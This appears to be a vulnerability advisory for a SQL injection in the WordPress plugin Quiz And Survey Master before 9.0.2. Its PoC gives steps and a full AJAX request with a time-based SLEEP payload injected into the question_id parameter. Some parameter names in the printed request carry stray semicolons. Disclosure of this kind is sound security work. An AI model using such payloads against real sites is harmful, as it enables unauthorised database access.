Quiz And Survey Master < 9.0.2 - Contributor+ SQLi

Description The plugin is vulnerable does not validate and escape the question_id parameter in the qsm_bulk_delete_question_from_database AJAX action, leading to a SQL injection exploitable by Contributors and above role

PoC

1. You will need a valid nonce for deletion of quiz questions. 2) Sign in as a Contributor, create a quiz with at least one question. 3) Edit the Quiz and click the “Delete All” button to fire off the right request with a valid nonce. 4) Replace the question ID with the payload below to sleep for 5 seconds: (SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a) Request: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: test.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://test.site/wp-admin/admin.php?page=mlw_quiz_options&amp;quiz;_id=1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 118 Origin: http://test.site Connection: keep-alive Cookie: Contributor_Cookie action=qsm_bulk_delete_question_from_database&question;_id=(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)&nonce;=577a29f6f1